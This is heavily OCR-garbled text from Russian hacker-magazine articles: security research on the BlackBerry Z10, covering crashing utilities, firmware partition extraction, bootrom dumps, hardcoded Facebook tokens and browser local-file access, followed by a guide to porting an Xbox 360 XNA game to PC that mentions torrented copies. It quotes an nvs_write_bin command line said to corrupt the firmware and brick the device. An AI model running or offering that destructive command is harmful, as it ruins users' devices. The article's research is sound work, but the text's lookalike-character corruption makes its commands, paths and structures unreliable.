Іізріау ЕННОК: 1 пі1е_зеІ_роеег_зіаіе - пі1е_зеІ_роѵег_зіаіе: Гаііед іо орел /Оеѵ/пра Гог гсагі/ѵгііе 

Іізріау БЯКОВ: 1 І2с_гса0 гсд ./рсгірЬсга1з/Ьаск1ідЫз/соопоп/і2с_ссхпоп. с Сои ІО поі зепсі апсі гесеіѵе І2с вазісг сіаіа Ггсп Осѵ 0x31 гед 0x1 9 

Іізріау ЕЯКОЯ: 1 1*3585 Ьѵ зеі сНа где ривр ѵоііаде - Гаііед Іо геа<1 гедізіег В01 - сіо поі сЬапде сЬагде ршф 

Іізріау ЕЯКОЯ : 1 Ьурегпоѵа рапсі деі г О Но рапеі соппесіеО (по сіаіа геіигоеО Г гоп 1 п гелсі) 

Іізріау ЕЯКОК: 1 Ьурегпоѵа_рапе1_д*і_ід - Но рапеі соппесіесі (по сіаіа геіигоекі Г гоп ю гг аіі) 

Іізріау ЕЯКОЯ : 1 Ьурегпоѵа рапеі деі ій - Но рапеі соппесіеО (по сіаіа геіигоесі (гоп ІО геаО) 

Іізріау БЯКОЙ: 1 пі1е_зес_роѵег_яіаІе пі1е_зеі_ро«ег_зіаІе: Гаііед іо ореп /сіеѵ/пра Гог гелсі/ѵгііе 

Іізріау ЕЯКОЯ: 1 І2с_геас1_гед - . /регірЬега1з/Ьаск1ідЫз/саоаюп/і2с_ссяяоп. с Сои Ісі поі зепсі апсі гесеіѵе і2с вазіег сіаіа I гсп сіеѵ 0x31 гед 0x1 9 

Іізріау ЕЯКОК: 1 1*3585_Ьы_зе1_с1мгд«_{хяр уо11аде - Гаііесі іо геасі гедізіег Я01 - до поі сЬапде сЬагде рвр 

Іізріау ЕЯКОЯ : 1 Ьурегпоѵа рапеі деі ісі - Ко рапеі соппесіесі (по сіаіа геіигоесі 1 г осп ІО геасі) 

Іізріау ЕЯКОК: 1 Ьурегооѵа_рапеІ_деі_ід Но рапеі соппесіесі (по сіаіа геіигоесі (гая ІО геад) 

Іізріау БЯКОВ: 1 Ьурегпоѵа_рапе1_деі_іс1 - Но рапеі соппесіесі (по сіаіа геіигоесі (гоя 10 геасі) 

Іізріау БЯКОВ: 1 пііе зсі_ромег зіаіе пііе зсі_ро«сг зіаіс: Гаііед іо орсп /йсѵ/пра Гог гсай/нгііс 

Іізріау ЕЯКОК: 1 І2с_г*лй_гед ./регірЬсга1а/Ьдск1ідЫз/санвоп/і2с_ссяяоп. с Сои 1 сі поі зепсі апсі гесеіѵе І2с вазіег сіаіа (гоя сіеѵ 0x31 гед 0x1 9 

Іізріау ЕЯКОК: 1 1*358 !> Ьи зеі сЬа где _ривр_ѵо1 саде - Гаііед іо геад гедізіег ИОІ - до поі сЬапде сЬагде ривр 

Іізріау ЕЯКОК: 1 Ьурегпоѵа_рапе1_деі_ід - Но рапеі соппесіед (по сіаіа геіигпед Г гоя 10 геад) 

Іізріау ЕЯКОЯ: 1 І2с геад гед - /. ./регірЬега1з/Ьаск1ідЫз/саноп/і2с сснвоп. с Соиід поі зепО апО гесеіѵе І2с вазіег Оаіа Ггоп Оеѵ 0x31 гед 0x1 9 

Іізріау ЕНКОй: 1 1я3585_Ьѵ_эеі_сЬагде_ривр_ѵо1іаде - Гаііед іо геад гедізіег Й01 - до поі сНапде сЬагде ривр 

Іізріау БЯКОВ: 1 І2с_гса0 год ./регірЬега1э/Ьаск1ідЫз/ссішоп/і2с_с<жпоп. с Соиід поі зепО апй гесеіѵе і2с вазіег Оаіа ігоо Осѵ 0x31 гед 0x1 9 

Іізріау ЕЯКОЯ: 1 1*358Ь_Ьѵ_зеі_еЬагде ривр ѵоііаде - Гаііед іо геад гедізіег К01 - до поі сНапде сЬагде ривр 
Іізріау: 1 пі!с_дізр1ау іяадс рлсіОг :Ьа4СОООО, ѵасКІг :78сООООО аі 1, 1,(370x240) 
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на запуск все же есть, многие из утилит при запуске крашатся 
с пиІІ-роіпіег сіеге^егепсе: 

РгосезБ 57340127 ( сІ±5 ріаѵсііі ) 1=егтіпа1=есІ 5І65Е6Ѵ <-» 
сос!е=1 Л1:по=11 ір=788293сІ2( , /Ьа5е/и5г/1іЬ/^парІііс5^-' 
/гп5т896Ѳ/сІІ5р1ауНАІ.- гѲ86. 50@сІ5І_§е^_рс1к_-Ргед+4-- 
0x121) тарасІсІг=ѲѲѲѲ93сІ2. ге-р=ѲѲѲѲѲѲѲ8 
РгосезБ 249935Ѳ86 (поыріаѵіп^’) 1=ептіпа1=есІ 5І65Е6Ѵ <-■ 
сос!е=1 Я1:по=11 ір=781Ѳ2ссе(7и5г/5Ьіп/поѵф1ауіп%@<-< 

таіп+Ѳх!9сП ге-Р=ѲѲѲѲѲѲѲѲ 

Ргосѳбб 1547274689 (гезоигсе зеесП Ііегтіпаііесі <-■ 
5І65Е6Ѵ сос!е=1 Я1=по=11 ір=Ѳ1386сІ44(/и5г/1іЬ/1сІдпх.о-- 
50.2(9 51=оіп1:+Ѳх2Ѳ) тарасІсІг=ѲѲѲ36сІ44. ге-р=ѲѲѲѲѲѲѲѲ 
РгосеББ 1543295477 (бішіісіоілЫ Ігегтіпаііесі 5І65Е6Ѵ <-■ 
сос!е=1 Я1:по=11 ір=78117сЗе(/ргос/Ьоо1=/5Ііи1=сІоіл/п-4-- 
т5т896Ѳ.50(а)ртіс ббЬі геасІ+ѲхІБ’) тарасІсІп=ѲѲѲѲ1сЗе. <-■ 
ге-р=-р-р-р-р-р-р-р-р 
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Рис. 4. Загояовокфай- 
яа прошивки 
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Рис. 5. Вывод утилиты 
сПкдпхбТз 



Аналогично из-за недоступности /сІеѵ/і2с2 утилита 
сІіБрІаусІіІ не работает должным образом (вернее, не за- 
пускается совсем), но, немного пошаманив с переменны- 
ми окружения, ее таки можно запустить и... «убить» дисплей 
до следующего перезапуска (рис. 2). 

Но самое вкусное ждет в утилите пѵ5_ыгі1:е_Ьіп, использу- 
емой, как следует из названия, для записи в NN/3 (поп-ѵоіаіііе 
зіюгаде). Несмотря на то что при стандартном запуске утилиты 
она завершается с ошибкой геаб-опіу Тііезузіепл, запись в про- 
шивку таки осуществляется! Приведенная ниже строка, взятая 
прямо из хелпа утилиты, ведет к повреждению прошивки и, 
как следствие, тотальному фейлу ОС: при следующем пере- 
запуске все, что вы увидите, — это мигающий красный огонек 
на черном кирпиче с надписью ВІаскВеггу (рис. 3). 

А вот и обещанная роковая строка: 

пѵ5_мггЕе_Ьіп /1іЬ/6пшаге/1:і1283/пѵ5_тар. Ьіп <-■ 
САВСС88Р7201 



Для восстановления необходимо подключение к ВІаскВеггу 
І_іпк и полная переустановка. Если немного подумать, ста- 
новится ясно, что и это не самый плохой сценарий, — так 
как существует возможность вызова определенных зузсаІГов 
и внесения изменений в прошивку, осмысленная запись в нее 
может привести вплоть до джейлбрейка и полного контроля 
над устройством. Поскольку это только первичное исследова- 
ние, пруфов пока не будет. 

ПРОШИВКА, ИЛИ ЧТО В ЛАРЦЕ? 

В предыдущем разделе мы рассмотрели повреждение про- 
шивки. В этом — приоткроем завесу и посмотрим, что внутри. 

Для начала запустим Рігплѵѵаге Іірсіаіе и промониторим путь, 
куда сохраняется ВАРІ-архив (для ѴѴіпсІоѵѵз это %АРРОАТА%\ 

І_осаІ\Везеагсб Іп Мо1:іоп\АррІіса1:іоп І_оасІег\). Далее залезаем 
внутрь при помощи любимого архиватора и экстрактим огром- 
ный бинарник, начинающийся с ОѴѴОРЮ’а \х71\х63\х66\х60 

(тТсц) — типичного хедера ОЫХ-ітаде. Рис. 6. Экстрактим 

В заголовке файла, помимо даты создания, размера разделы при помощи 

и других общих характеристик, представлены также заголов- яс*т_рагзег.ру 




ки секций, начинающиеся с ОѴѴОРЮ \х70\х66\х63\х71 (цсТр). 
В каждом из них также описаны формат секции, время син- 
хронизации, количество блоков в секции, размер блока и дру- 
гие. Забегая вперед: полный список параметров можно про- 
смотреть при помощи стандартной утилиты сбкцпхбТз (рис. 5). 

Очевидно, что, поскольку имеются разделы, было бы круто 
заэкстрактить и их тоже! К счастью для нас, в 2012 году ребята 
Зак Ланье (2асб І_апіег) и Бен Нелл (Веп ЫеІІ) провели первич- 
ное исследование ВІаскВеггу РІауВоок и написали несколько 
чрезвычайно полезных утилит для работы с образами ОІМХ 
( аоо.аІ/РЮ4Ц0 ). 

В частности, скрипт дс^плрагзег.ру, как следует из назва- 
ния, используется для автоматического извлечения указанных 
разделов (рис. 6). 

Среди них наиболее интересен для нас ІРЗ-раздел (ІРЗ = 
іпладеТіІезузІвпл). Для получения данных, содержащихся в нем, 
обычно используется утилита сІитрі-Рз. Но если в ВІаскВеггу 
РІауВоок она была доступна для запуска (правильнее сказать: 
«была»), то в новом ВІаскВеггу 210, увы, ее нет. Здесь стоит 
отметить, что, несмотря на то что на устройстве установлена 
ОІМХ 8.0.0, она совместима и с 6-й версией (что подтверждают 
доступные по умолчанию утилиты сНкяпхб-рБ/ткяпхб-рБ). По- 
чему бы не попробовать на десктопной «шестерке»? Если это 
сработает, то мы сможем получить доступ ко всем внутренно- 
стям прошивки, да еще и с привилегиями рута! 

Сказано — сделано. Регистрируемся на официальном сай- 
те, скачиваем последнюю ОІМХ ІМеиІтіпо 6.5.0 и устанавливаем 
ее на виртуалку. После настройки обмена файлами между хо- 
стом и таргет-системой (я предпочел использовать для этих 
нужд РТР), к нашей радости, обнаруживаем, что сІитрі-Рз 
не только присутствует среди дефолтных утилит, но и к тому 
же работает! Выбрав папку для записи и использовав еще 
один небольшой скрипт, базирующийся на запуске этой самой 
сІиплріРз (іРз_рагзе.ру), извлекаем содержимое из ІРЗ-раздела. 

Внутри нас ждет три папки: базе/ — с библиотеками, 
гооѴ — с файлом .ргоРіІе, содержащим в себе переменные 
окружения (в частности, ВООТ_І_ОАОЕВ=ВІМВООТ), а также 
ргос/. В последней в подпапке /бооі/ и находятся те самые 
утилиты, которые запускаются при загрузке системы, а также 
само микроядро. Стоит отметить, что оно и вправду компакт- 
ное — меньше 600 Кб. 

Первое, что сразу бросается в глаза, — обилие инфор- 
мативных скриптов (с другой стороны, чего еще можно было 
ожидать в папке бооі?!). Так, файлик с невзрачным именем 
.зсгірі содержит в себе информацию, которая требуется си- 
стеме для запуска: какие утилиты, как и в каком порядке за- 
пускать. Скрипт і-р5_ѵагіаЫеБ.5Іі импортируется во все 
остальные скрипты и содержит в себе определения системных 
переменных (оттуда же можно узнать, например, СЗВІ базе 
асісігезз, а также пути, по которым находятся конфиг-файлы, — 
и они тоже доступны). В работе не был подробно рассмотрен 
механизм определения целостности (конечно, образ подпи- 
сан, нохак-пути неисповедимы), однако для любознательных 
в папке лежит скрипт 05_сІеѵісе_іта§е_сІіеск, попробуй уга- 
дать, для чего он используется :). 

Стоит отметить, что помимо скриптов, разумеется, теперь 
доступны и все утилиты из папки /Ьоо\/. Как мы помним, в пре- 
дыдущем разделе ошибки в логике системных вызовов позво- 
лили нам «закирпичить» устройство и дали пищу для размыш- 
лений и будущих исследований. Продолжим тему. До этого 
недоступная утилита регзізМооІ после копирования и при- 
своения ей необходимых прав доступа позволяет дампить об- 
ласти постоянных данных (регзізіепі: сіаіа агеаз), метрики ОС, 
а также бооітот. Опять же это значит, что возможно манипу- 
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Рис. 7. Листинг ІІНІ-схем 
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Рис. 8. Кое-что еще 



Презентация «Ѵоідііі- 
КатрТТЧпд ТИе 
ВІаскВеггу РІауВоок» на 
Іпіііігаіе 2012: 

ооо.дІ/Тг80Х 

Веб-сайт группы Реісоп 
Мозсоѵѵ: 

сіеісоп-тозсоѵѵ.ого 



лировать системными вызовами. Как вариант, существует воз- 
можность создания утилиты с похожей функциональностью, 
которая будет читать и дампить данные из других областей, 
которые (по идее) должны быть защищены. 

Частичный вывод Ьооітопл- метрик представлен ниже. 

Вооіігот ѴегБІоп: 0Х0523001Р (5. 35.0.29) 
Реѵісе51:гіп§: КІМ ВІаскВеггу Реѵісе 
В иіІ с НІзег ІМате : ес_а§еп1: 

ВиіІсІРаІіе: ІМоѵ 3 2012 



ІзІпзесигеРеѵісе: -Раізе 
Н1лІѴег5ІопО-р-р5е1=: 0Х000000Р4 
МитЬегНІлІѴЕпІіпіез : 0x00000014 
МетС-Р^ТаЫеО-р-РзеІ:: ѲхѲѲѲѲѲѲГС 
МешС-Р^ТаЫеБіге: 0x00000100 
РгІѵѳгб: 0x00000010 [ ММС ] 
І.РКВ1оскАсІсІг : 0Х2Е02РЕ00 
ВооІгготБіге: 0x00080000 
ВКРег5І5І=АсІсІп: 0Х2Е0АРС00 



Еще одна интересная фича такого подхода к анализу про- 
шивки через разделы — большое количество данных не за- 
шифровано. Так, можно просматривать сорцы различных 
скриптов, строки с информацией об аккаунтах и прочие инте- 
ресности. Например, при помощи простого поиска по строкам 
можно узнать детали реализации принципиально новой систе- 
мы управления при помощи жестов (если точнее, масштаби- 
рования): 



1^ 

Рис. 9. Типичный краш 
ВІаскВеггу Вгоѵѵзег 

^1 

Рис. 10. Доступ 
к локальным файлам 
изНТМІ. 



-Рипсігіоп зе1:5сгееп5са1іп% (місПііі. Ріеі^іті: ) { 



// Функция 200М'а полна багов — в документации 
// сказано, что координаты должны быть всегда 
// в центре экрана (что бы это ни значило! — 

// Прим, ред.) 

ІТ ( ыісііііі < сІеѵісеЫісІІіІі && сіеѵісеіліісііііі > <-■ 

сІеѵісеНеі^ІіІ: ){? 

// Для ее выполнения необходимо задать 

// НЕВЕРНЫЕ координаты верхних осей х и у 

// экрана 

ѵісІеоБсгоІІѴіеы. гоотТоРоіпІіГ ыісііііі / 4, Ѳ, <-■ 
га іііо) ; 



Тем же способом, например, можно узнать все ШІ-схемы, 
ассоциированные с приложениями ВІаскВеггу (рис. 7). 

Не остались в стороне и приложения для работы в соцсе- 
тях. Но если в большинстве из них хардкода особо не наблю- 
далось, то в РасеЬоок его хоть отбавляй. Внутренние ШІ_- 
адреса, запросы, АРР Ю, токены... А как насчет Ю, етаіГов 
и мобильных телефонов разработчиков? :) Но больше все- 
го мне понравилась строчка с рис. 8. Дальше писать про РВ 
не буду, скажу только, что, чтобы потусить с разработчиками, 
можно заценить их комьюнити вот тут: ННрзѴАл/ѵѵѵѵТасеЬоок. 
сот/Ьасопігаіп . 

ПАРА СЛОВ О БРАУЗЕРЕ 

Помимо прочего, в ВІаскВеггу есть и свой ВІаскВеггу Вгоѵѵзег. 
Он основан на рендерном движке ѴѴеЬКіІ, том самом, кото- 
рый используется в СІіготе, ЗаТагі и Яндекс. Браузере :). Это 
значит, что, если у тебя есть свежий краш для СНготе, высо- 
ка вероятность, что он сработает и на ВВВ. Пример типичного 
краша представлен на рис. 9. 

Тем не менее, ввиду специфик ОІЧХ и жесткого разграни- 
чения прав доступа, эксплуатация таких уязвимостей чрезвы- 
чайно сложна, и в большинстве случаев атакующий сможет 
выполнять код и иметь доступ к файлам только с правами 
пользователя ѴѴеЬКіІ. 

Интересная особенность браузера заключается в том, 
что доступ к локальным файлам может быть осуществлен 
непосредственно из адресной строки. Еще веселее, что, от- 
крыв НТМІ_-аттачмент из письма, можно увидеть следующую 
картину (рис. 10). 

Стоит отметить, однако, что уязвимость СѴЕ-201 2-5828, 
которая позволяла выполнять произвольный ЦЗ-код в локаль- 
ном контексте браузера, в настоящее время устранена. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Я надеюсь, что, несмотря на сжатость и лаконичность мате- 
риала, ты усвоил основную идею подхода к тестированию 
различных девайсов. Более подробно рассмотренный про- 
цесс изучения ВІескВеггу и его результаты ты можешь найти 
тут: аоо.аІ/УРітЗ . Если у тебя возникли какие-то вопросы, 
то я с радостью отвечу на них по электронной почте или лич- 
но, в рамках очередной встречи РеТсоп Мозсоѵѵ, расписание 
которых ты всегда можешь найти здесь: сіеісоп-тозсоѵѵ.ога . 
Кеер Иаскіпд! НЕ 



Меѵѵ Раде Вгоѵѵзег Сга$Н 

ТНе Ьгоѵѵзег сгазИес! ипехресіесііу. Уои сап сЬоозе Іо ге$*оге *Ье радез 
ог сгеаіе а пеѵѵ Ыапк раде. 

ЦеГсоп-тозсоѵѵ.огд/ѵѵеЬкЦ/сгазЬ.ІіІтІ 

Ы1р://сІе1 : соп-то5соѵѵ.огд/\л/еЬкі1:/сга5Ь.Ы:тІ 
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ОІІТ8ЮЕ ТНЕ ВОХ 



Как перенести чужую игру с ХЪох збо на РС 

Скандальная новость, взволновавшая игроков аккурат перед ЕЗ (Еіесігопіс Епіегіаіптепі Ехро), 
пришла из России — хакер собственноручно портировал на РС игру ТЬе ОізЬѵѵазЬег: Ѵатріге 
Зтііе! До того момента проект был выпущен эксклюзивно под ХЬох 360, а тут вдруг без всяких 
эмуляторов (которых для ХЬох 360 и не существует) — получите, распишитесь — полноценный 
порт. Хочешь узнать, как можно такое провернуть? Тогда читай внимательно — опытом делится 
тот самый хакер, который разобрал РізЬѵѵазЬег по кусочкам, а затем собрал его заново для РС. 



Какой бы логикой не руководствовался разра- 
ботчик игры, у него есть полное право решать, 
на каких платформах будет представлена его 
игра. Поэтому с этической точки зрения сторон- 
ний порт — сомнительная затея. Разработчики 
ЭізІіѵѵазІіег отреагировали на действия ВагаЬиз 
достаточно спокойно, но это не значит, что также 
в подобной ситуации повели бы себя и другие. 
Тем не менее, подобный порт оказался интерес- 
ной, а главное — решаемой технической задачей, 
поэтому предлагаю сфокусироваться на этом. 

НАЧАЛО. ИЗВЛЕЧЕНИЕ И ДЕКОМПИЛЯ- 
ЦИЯ ИСПОЛНЯЕМОГО МОДУЛЯ ИГРЫ 

Перед тем как начать, сразу предупрежу: мы бу- 
дем говорить только про портирование игр, на- 
писанных с использованием ХЫА, — к другим 
данная методика не подходит. Частичный список 
таких проектов можно посмотреть по ссылке: ЬИ:. 
Іѵ/13ѵІ\ІтЬа . В графе Р1а1:Тогт(5) видно заветные 
ХЬох-эксклюзивы. 

Очевидно, что для начала нам понадобится 
раздобыть 8ТР5/І_ІѴЕ-пакет с игрой. Его можно 
получить, сняв со своего ХЬох 360 через систему 
резервирования на внешний носитель, или про- 
сто скачать чужую копию с торрентов. После чего 



его необходимо распаковать. Для этого существу- 
ют специальные инструменты: ѵѵхРігз, І_е РІиТТіе 
и РуІЬоп -скрипт ехІгасІЗбО.ру (подробно на них 
мы останавливаться не будем, всю необходимую 
информацию можно почерпнуть здесь — ІтеебО. 
ога/5ТР5 . 

После распаковки у нас на руках будут файлы 
игры. Среди них находим файл дате.ехе.хех. Это 
контейнер, в котором находится исполняемый 
модуль интересующей нас игры. Он прикреплен 
в качестве ресурса. Чтобы извлечь его, понадо- 
бится утилита хехіооі. Она лежит в открытом до- 
ступе, и ее несложно найти с помощью Соодіе 
(или взять с нашего диска). Извлекаем исполня- 
емый модуль командой: 

хехЬоо! -сі гез дате.ехе.хех 

Извлеченные ресурсы будут помещены 
в папку гез. Это два файла, нам интересен файл 
А88ЕМВ1Х переименовываем его в дапле.ехе. Те- 
перь у нас на руках сборка .ЫЕТ — исполняемый 
модуль игры. Его нужно декомпилировать. Для де- 
компиляции я использовал .ЫЕТ ВеНесІог, но по- 
дойдет и любой другой декомпилятор. После это- 
го у нас на руках окажется весь исходный код игры. 



Теперь необходимо узнать версию ХЫА, с по- 
мощью которой сделана игра. Тут все просто: 
среди файлов, которые мы извлекли из 5ТР8/ 
иѴЕ-пакета, есть папка Нипйте. В ней лежит дру- 
гая папка, соответствующая номеру версии ХЫА: 
ѵ2.0, ѵЗ.О, ѵЗ.1 или ѵ4.0. Теперь нам известна ис- 
пользованная при разработке версия ХЫА. 

Для дальнейшей работы понадобится ѴізиаІ 
Зіисііо и ХЫА Сате Зіисііо нужных версий. ХМА 
4.0 предназначена для Ѵ32010, ХЫА 3.0 и 3.1 — 
для Ѵ32008. С ХЫА 2.0 я никогда не работал, воз- 
можно, подойдет Ѵ32008 или Ѵ32005. После того 
как ѴізиаІ Зйісііо и ХЫА Сате ЗШсІіо нужных версий 
установлены, создаем в ѴізиаІ Зіисііо проект ХЫА 
Сате для ѴѴіпсІоѵѵз и добавляем полученный нами 
исходный код игры. Пробуем собрать. Скорее все- 
го, будет ряд ошибок, которые необходимо испра- 
вить. Также придется подключить к проекту ряд 
сборок. В конечном итоге должен получиться со- 
бираемый без ошибок исполняемый модуль игры. 

РАСПАКОВКА РЕСУРСОВ 

Теперь нам предстоит извлечь все ресурсы игры, 
запакованные в ХЫВ-файлы. ХЫВ — это контей- 
нер ХЫА, используемый для хранения ресурсов: 
моделей, текстур, шрифтов, эффектов. Ксожале- 
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нию, ресурсы, скомпилированные для ХЬох 360, 
не подходят для ѴѴіпсІоѵѵз. Осложняется ситуация 
тем, что контейнеры еще и недокументированные. 
Предполагается, что разработчика игр не дол- 
жен волновать их формат. Собственно, так и есть. 
Но для нас-то он представляет большой интерес. 

Первое, что следует знать, — контейнеры бы- 
вают двух видов: сжатые и без сжатия. Опреде- 
лить это можно по заголовку контейнера, который 
можно описать структурой: 

зіігисі: ХІМВНеасІег { 

сЬаг Ма§іс[3]; // Сигнатура 'ХІМВ' 
сЬаг Ріаіі- Рогт; // Целевая платформа: 

// х - ХЬох 360. м - ілііпсіомз . 

// т - ілііпсіошз РЬопе 7 



// Версия контейнера 

сііаг ХІМВРогтаІіѴегзіоп ; 

// Флаги формата данных 

сііаг РІа^ВіІіз; 

Обрати внимание на поле РІадВіІз. Если оно 
имеет флаг 0x80, то данные сжаты, в противном 
случае нет. Когда контент сжат, после заголовка 
следуют два двойных слова: 

ЦІІМТ32 СотргеззесІРіІеБіге; 

ЦІІМТ32 РесотргеззесІРаІіаБіге: 

Их смысл очевиден из их названия. В ХЫА ис- 
пользуется алгоритм сжатия І_2Х. Алгоритм от- 
крытый и хорошо документирован, поэтому с де- 
компрессией никаких проблем нет. После этого 
записываем данные обратно в файл сразу после 
заголовка, перезаписав исходные сжатые данные. 
Это будет полезно для дальнейшего анализа. 

После выполнения описанных действий у нас 
не должно остаться ни одного контейнера, содер- 
жащего сжатый контент. 

ТЕКСТУРЫ 

Сразу после заголовка ХЫВ находятся данные, ко- 
торые можно описать следующим образом. 

ЦІІМТ32 РіІеБіге; // Размер файла 

// Тип контент-ридера 

сііаг ТуреКеасІегСоипІ:; 

// Размер имени типа содержимого 

ВУТЕ ТѵреІМатеЗіге; 

// Имя контент-ридера. для текстуры - 

// МісгозоТіі.Хпа.Ргатешогк.СопІіепІ:. 

// Тех1іиге2РКеасІег 

сііаг Рігз1:ТуреІМате[ТуреІМате5І2е] : 

РіліСЖР сІіл/ЦпкѲ; // Неизвестно 

ІлІОКР сііл/ііпкі; // Неизвестно 

// Формат текстуры. См. соответствующее 
// перечисление в документации ХІМА бате 

// 51=исІіо 

РіліОКР Р огтаі:: 

РіліСЖР ЫісІІіІі ; // Ширина текстуры 

РІлІОКР Неі%1:Ь; // Высота текстуры 

РіліОКР Міртарз: // Число Міртар слоев 

// Размер данных текстуры в байтах 

РіліОКР Тех1=игеРа1=а$І2е; 

// Собственно массив с данными текстуры 
ВУТЕ Тех1=игеРа1=а[Тех1=игеРа1=а5І2е] ; 

В качестве контейнера для извлечения текстур 
лучше всего использовать ЭЭЗ. Для извлечения 
данных необходимо знать, что такое формат ЭЭЗ, 
основные форматы текстур и алгоритмы их сжа- 
тия, а также размерность единиц данных. Данные 
в процессе извлечения нужно конвертировать 
из Ьід-епсііап в ІіШе-епсІіап. Всю эту информацию 



можно почерпнуть из документации ЭігеЫХ ЗЭК 
или других профильных справочников. 

ДЕКОМПИЛЯЦИЯ 
РЕСУРСОВ ПРОЕКТАХАСТЗ 

ХАСТ 3 — это система управления аудиоконтен- 
том, выпущенная компанией МісгозоТС. Система 
не снискала популярности среди разработчи- 
ков и встречалась по большей части в играх, 
созданных с использованием ХЫА для ХЬох 
360 и ѴѴіпсІоѵѵз. К сожалению, контейнеры ХАСТ 
3 не документированы. Поэтому перед тем, 
как приступить к их декомпиляции, пришлось 
тщательно изучить спецификацию ХАСТ Ргоіесі: 
Рііе Рогтаі: (расширение хар) — формат тексто- 
вого файла проекта ХАСТ. Ее можно найти в до- 
кументации ЭігесІХ ЗЭК. Также будет нелишним 
изучить и саму среду ХАСТ 3. Я провел анализ 
контейнеров лишь в той части, которая была не- 
обходима для полного восстановления параме- 
тров проекта ЭізЬѵѵазЬег. 

ХС8 

Начнем с анализа контейнера ХСЗ. ХСЗ — это 
контейнер для ХАСТ СІоЬаІ Зейіпдз, содержащий 
базовые настройки проекта ХАСТ, категории, пе- 
ременные, настройки РІРС и ЭЗР Заголовок кон- 
тейнера можно описать следующей структурой: 

зіігисі: ХАСТбІоЬаІБеІіІііп^зНеасІег 

і 

РіліОКР сІіл/5і§па1=иге; 

ІлІОКР мСогѵЕепІіѴегзіоп; 

ІлІОКР мНеасІегѴегзіоп; 

ІлІОКР іл/Сгс; 

РіліОКР сІыЬазІіМосІібесІІ-оіл/; 

РіліОКР сІмІазіМосІібесІНі^Ь; 

// ... 

// Полный список членов структуры 

// ищи в электронной версии 

// статьи на диске, прилагаемом 

// к журналу 

іі_ 

Назначение параметров понятно из их на- 
званий. На что следует обратить внимание? 
Первое — данные выровнены по границе байта, 
при объявлении не забываем применить дирек- 
тиву ргадта раск. Это относится ко всем струк- 
турам всех контейнеров ХАСТ. Второе — недей- 
ствительные ссылки на таблицы имеют значение 
ОхРРРРРРРР (-1). Впрочем, при парсинге все рав- 
но будем проверять счетчики элементов таблиц, 
так что до невалидных ссылок, скорее всего, 
не доберемся . Ну и не забываем , что формат упа- 
ковки данных на ХЬох 360 — Ьід-епсііап. При чте- 
нии консольных контейнеров с ПК переставляем 
байты. 

После заголовка следуют собственно, табли- 
цы данных. Они описываются следующими струк- 
турами. 

Элементы таблицы Саіедогіез и связанные 
типы: 

зігисі: ХАСТбІоЬаІБеІіІііп^зСаІіе^огѵ 

І_ 

// Описание структуры ищи в элек- 
// тронной версии статьи на диске. 

// прилагаемом к журналу 

ХАСТІпзіапсеІ-ітіІ: іпзіапсеі-ітіі: ; 

ІлІОКР пРагепіі: 

ВУТЕ пѴоІите; 

ВУТЕ ЬВаск^гоипсІМизіс : 1 ; 

ВУТЕ ЬРиЬІіс:!: 

ВУТЕ ЬКезегѵесІ:б; 

}; 



Элемент таблицы ѴагіаЫез: 



ХАСТѴагіаЬІе 



{ 






ВУТЕ ЬРиЬІіс : 1; 




ВУТЕ ЬКеасІОпІу : 1; 




ВУТЕ Ыосаі :1; 




ВУТЕ ЬКезегѵесІ : 5; 




Поаі: пѴаІие; 




Поаі: пМіп; 




Поаі: пМах; 







Саіедогу НазЬ ТаЫе и ѴагіаЫе НазЬ ТаЫе — это 
просто массивы ЭѴѴОРЮ, содержащие индек- 
сы. Применения этим индексам я пока не нашел, 
но для декомпиляции проекта они, в общем-то, 
и не нужны. Элементы Саіедогу НазЬ ТаЫе Епіту 
и ѴагіаЫе НазЬ ТаЫе Епіту описываются структурой 

зіігисі: ХАСТНазЬТаЬІеЕпІігу 

і 

РіліОКР пРгіепсІІуІМатеО-Р-РзеІ:; 

ІлІОКР пІМехІіІпсІех; 

пРгіепсІІуМатеО^зеІ: ссылается на строку с име- 
нем категории или переменной, как ясно из на- 
звания, а вот пЫехІІпсІех — это очень интересно. 
При добавлении первой категории ХАСТ устанав- 
ливает полю значение 1 . После добавления второй 
категории полю первой категории присваивается 
значение ОхРРРР (-1 ), а для второй добавленной — 
2. И так далее. С переменными аналогично. 

Осталось упомянуть имена структур и пере- 
менных. И те и другие хранятся как массивы 
С-строк. Ссылки на имена получаем из элементов 
хеш-таблиц. 

Х5В 

Х8В — это контейнер для ХАСТ ЗоипсІ Вапк. 
Он включает в себя все настройки для звуков, 
используемых в игре, а также так называемых 
реплик (Сие), которые являются базовыми еди- 
ницами озвучки игр. 

Итак, начнем с заголовка контейнера. Его 
можно описать структурой 

зіігисі: ХАСТБоипсІВапкНеасІег 

і 

РіліОКР Бі^паііиге; 

ІлІОКР СопІіепІіѴегзіоп ; 

ІлІОКР НеасІегѴегзіоп; 

ІлІОКР С КС; 

РіліОКР ЬазІіМосІіІіесІІ-Оіл/; 

РіліОКР ІазІіМосШіесІНі^Ь; 

// ... 

// Полный список членов структуры 

// ищи в электронной версии 

// статьи на диске, прилагаемом 

// к журналу 

Назначение параметров понятно из их на- 
званий. Парсинг начнем с определения имен 
контейнеров ѴѴаѵеВапк, содержащих аудио- 
треки, используемые в контейнере ЗоипсІВапк. 
Для этого нам необходимо считать поле 
пЫитѴѴаѵеВапкЕпІіпез заголовка, перейти по сме- 
щению, описанному полем пѴѴаѵеВапкТаЫеОІТзеІ:, 
и прочитать соответствующее число структур вида 

зіігисі: ХАСТБоипсІВапкІлІаѵеВапкТаЫеЕітЬгу 

{ 

сЬаг 52РгіепсІ1ѵІМате[б4] ; 

ъ 
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Теперь у нас есть имена всех связанных кон- 
тейнеров ѴѴаѵеВапк. Далее переходим к чтению 
таблиц ЗіплрІеСиез и СоплрІехСиез. Их количество 
и смещения в файле получаем из соответствую- 
щих полей заголовка. После этого рассмотрим 
структуры таблиц ЗіплрІеСиез и СоплрІехСиез 
и связанные типы: 

з-ЕгисЕ ХАСТБоипсІВапкСие 

і 

ВУТЕ ЫѵреСотрІех:!; 

ВУТЕ ЫѵреІп -Еег асЕіѵе : 1 ; 

ВУТЕ ЬЦзеБоипсЮТТзеІ: : 1 ; 

ВУТЕ ЬКезегѵескБ; 

5~ЕгисЕ ХАСТБоипсІВапкБітрІеСие : <-» 

ХАСТБоипсІВапкСие 

{ 

РЫСЖР пБоипсЮ-р-РзеІ: ; 

ь 



Б~ЕписЕ ХАСТБоипсІВапкСотрІехСие : <-■ 
ХАСТБоипсІВапкСие 

і 

РЫСЖР пѴагіаІііопТаЫеО-Р-РзеІ:; 

РЫСЖР пБоипсЮ-Р-РзеІ: ; 

}; 

